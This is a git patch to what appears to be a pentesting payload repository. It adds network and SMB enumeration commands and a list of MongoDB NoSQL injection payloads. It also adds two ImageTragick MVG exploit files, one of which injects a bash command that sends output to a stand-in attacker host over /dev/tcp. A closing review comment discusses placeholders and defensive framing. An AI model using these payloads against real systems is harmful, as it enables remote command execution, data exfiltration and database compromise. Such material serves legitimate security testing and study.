From e89e4fd312a2582c9c2cfc56942abe2c8078a9d5 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Wed, 17 May 2017 20:40:45 +0200
Subject: [PATCH] Methodology updated with RPCClient, User enumeration

---
 Methodology_and_enumeration.md | 153 +++++++++++++-----
 NoSQL injection/README.md | 25 ++-
 .../payload_remote_connection.mvg | 4 +
 .../payload_remote_exec_command.mvg | 4 +
 4 files changed, 148 insertions(+), 38 deletions(-)
 create mode 100644 Upload insecure files/Image Tragik/payload_remote_connection.mvg
 create mode 100644 Upload insecure files/Image Tragik/payload_remote_exec_command.mvg

diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
index 6c3c3c0..760a9cb 100644
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@@ -42,55 +42,120 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
 ```
 ## Passive recon
-```
-Using Shodan (https://www.shodan.io/) to detect similar app
+* Using Shodan (https://www.shodan.io/) to detect similar app
-Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints :
-- look for JS files, old links
+* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints,
+ ```
+ look for JS files, old links
+ ```
-Using The Harvester (https://github.com/laramies/theHarvester)
-python theHarvester.py -b all -d domain.com
-```
+* Using The Harvester (https://github.com/laramies/theHarvester)
+ ```
+ python theHarvester.py -b all -d domain.com
+ ```
 ## Active recon
-* Basic NMAP (if allowed ^^')
-```bash
-sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
-sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
+* Basic NMAP
+ ```bash
+ sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
+ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
-• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
-• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
-• 192.168.0.1 is the IP address to scan
-• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
-• -iL INPUTFILE tells Nmap to use the provided file as inputs
+ • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
+ • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
+ • 192.168.0.1 is the IP address to scan
+ • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
+ • -iL INPUTFILE tells Nmap to use the provided file as inputs
+ ```
-nmap -A -T4 scanme.nmap.org
-• -A: Enable OS detection, version detection, script scanning, and traceroute
-• -T4: Defines the timing for the task (options are 0-5 and higher is faster)
-```
+* Aggressive NMAP
+ ```bash
+ nmap -A -T4 scanme.nmap.org
+ • -A: Enable OS detection, version detection, script scanning, and traceroute
+ • -T4: Defines the timing for the task (options are 0-5 and higher is faster)
+ ```
+
+* NMAP and add-ons
+ 1. Using searchsploit to detect vulnerable services
+ ```bash
+ nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
+ ```
+ 2. Generating nice scan report
+ ```bash
+ nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
+ ```
-*
-```bash
-nmap -p- -sV -oX a.xml host.domain.org
-searchsploit --nmap a.xml
-```
 * NMAP Scripts
-```bash
-nmap -sC : equivalent to --script=default
+ ```bash
+ nmap -sC : equivalent to --script=default
-nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
-PORT STATE SERVICE
-80/tcp open http
-| http-enum:
-| /phpmyadmin/: phpMyAdmin
-| /.git/HEAD: Git folder
-| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
-|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
+ nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
+ PORT STATE SERVICE
+ 80/tcp open http
+ | http-enum:
+ | /phpmyadmin/: phpMyAdmin
+ | /.git/HEAD: Git folder
+ | /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
+ |_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
-List Nmap scripts : ls /usr/share/nmap/scripts/
-```
+ nmap --script smb-enum-users.nse -p 445 [target host]
+ Host script results:
+ | smb-enum-users:
+ | METASPLOITABLE\backup (RID: 1068)
+ | Full name: backup
+ | Flags: Account disabled, Normal user account
+ | METASPLOITABLE\bin (RID: 1004)
+ | Full name: bin
+ | Flags: Account disabled, Normal user account
+ | METASPLOITABLE\msfadmin (RID: 3000)
+ | Full name: msfadmin,,,
+ | Flags: Normal user account
+
+ List Nmap scripts : ls /usr/share/nmap/scripts/
+ ```
+
+* RPCClient
+ ```bash
+ ╰─$ rpcclient -U "" [target host]
+ rpcclient $> querydominfo
+ Domain: WORKGROUP
+ Server: METASPLOITABLE
+ Comment: metasploitable server (Samba 3.0.20-Debian)
+ Total Users: 35
+
+ rpcclient $> enumdomusers
+ user:[games] rid:[0x3f2]
+ user:[nobody] rid:[0x1f5]
+ user:[bind] rid:[0x4ba]
+ ```
+* Enum4all
+ ```
+ Usage: ./enum4linux.pl [options]ip
+ -U get userlist
+ -M get machine list*
+ -S get sharelist
+ -P get password policy information
+ -G get group and member list
+ -d be detailed, applies to -U and -S
+ -u user specify username to use (default “”)
+ -p pass specify password to use (default “”
+ -a Do all simple enumeration (-U -S -G -P -r -o -n -i).
+ -o Get OS information
+ -i Get printer information
+ ==============================
+ | Users on XXX.XXX.XXX.XXX |
+ ==============================
+ index: 0x1 Account: games Name: games Desc: (null)
+ index: 0x2 Account: nobody Name: nobody Desc: (null)
+ index: 0x3 Account: bind Name: (null) Desc: (null)
+ index: 0x4 Account: proxy Name: proxy Desc: (null)
+ index: 0x5 Account: syslog Name: (null) Desc: (null)
+ index: 0x6 Account: user Name: just a user,111,, Desc: (null)
+ index: 0x7 Account: www-data Name: www-data Desc: (null)
+ index: 0x8 Account: root Name: root Desc: (null)
+
+ ```
 ## List all the subdirectories and files
@@ -118,6 +183,20 @@ More subdomain : gobuster -w wordlist -u URL -r -e ``` +* Using Sublist3r +```bash +To enumerate subdomains of specific domain and show the results in realtime: +python sublist3r.py -v -d example.com + +To enumerate subdomains and enable the bruteforce module: +python sublist3r.py -b -d example.com + +To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines +python sublist3r.py -e google,yahoo,virustotal -d example.com + +python sublist3r.py -b -d example.com +``` + * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) ```bash #!/bin/bash diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 1b47522..d7e156a 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -24,6 +24,29 @@ username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* ``` +## MongoDB Payloads +``` +true, $where: '1 == 1' +, $where: '1 == 1' +$where: '1 == 1' +', $where: '1 == 1' +1, $where: '1 == 1' +{ $ne: 1 } +', $or: [ {}, { 'a':'a +' } ], $comment:'successful MongoDB injection' +db.injection.insert({success:1}); +db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 +|| 1==1 +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +{$gt: ''} +[$ne]=1 +``` + + ## Thanks to * https://www.dailysecurity.fr/nosql-injections-classique-blind/ -* https://www.owasp.org/index.php/Testing_for_NoSQL_injection \ No newline at end of file +* https://www.owasp.org/index.php/Testing_for_NoSQL_injection +* https://github.com/cr0hn/nosqlinjection_wordlists diff --git a/Upload insecure files/Image Tragik/payload_remote_connection.mvg b/Upload insecure files/Image Tragik/payload_remote_connection.mvg new file mode 100644 index 0000000..bca419d --- /dev/null 
+++ b/Upload insecure files/Image Tragik/payload_remote_connection.mvg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(http://IP_ATTAQUANT/)'
+pop graphic-context
diff --git a/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg b/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg
new file mode 100644
index 0000000..2664ca6
--- /dev/null
+++ b/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg
@@ -0,0 +1,4 @@
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)'
+pop graphic-context
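Review bot: Both new `.mvg` samples rely on the placeholder `IP_ATTAQUANT` (French for attacker IP) while the rest of the visible text is English, and nothing in the commit says the value must be substituted before use — twice in `payload_remote_exec_command.mvg`; rename it to `ATTACKER_IP` or add a line to the README of `Upload insecure files` describing the placeholder. That README entry should also carry the defensive framing a methodology repository needs beside a sample: the `fill 'url(...)'` line is only acted on by an ImageMagick install whose coder policy still permits the URL-style delegates, so the sample doubles as a check that `policy.xml` disables those coders and that uploads are validated by content rather than by extension. `payload_remote_connection.mvg` (the first of the two hunks) triggers only an outbound request and is the variant to use when the goal is confirming exposure without executing anything; stating that in the README spares readers inferring purpose from the filename.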